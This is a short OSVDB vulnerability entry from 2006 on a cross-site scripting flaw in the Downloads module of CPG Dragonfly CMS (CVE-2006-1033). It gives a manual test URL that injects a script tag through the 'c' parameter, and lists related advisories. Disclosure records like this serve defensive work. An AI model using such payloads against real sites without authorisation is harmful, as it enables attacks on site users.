CPG Dragonfly CMS Downloads Module c Variable XSS

2006-02-22T07:17:34
ID OSVDB:23413
Type osvdb
Reporter OSVDB
Modified 2006-02-22T07:17:34

Description

Manual Testing Notes

http://[target]/index.php?name=Downloads&c=1"><script>alert()</script>

References:

Vendor URL: http://dragonflycms.org/ Security Tracker: 1015661 Secunia Advisory ID:18940 Related OSVDB ID: 23408 Related OSVDB ID: 23410 Related OSVDB ID: 23409 Related OSVDB ID: 23411 Related OSVDB ID: 23412 Related OSVDB ID: 23414 Related OSVDB ID: 23415 Other Advisory URL: http://lostmon.blogspot.com/2006/02/multiple-cross-site-scripting-in.html FrSIRT Advisory: ADV-2006-0688 CVE-2006-1033 Bugtraq ID: 16784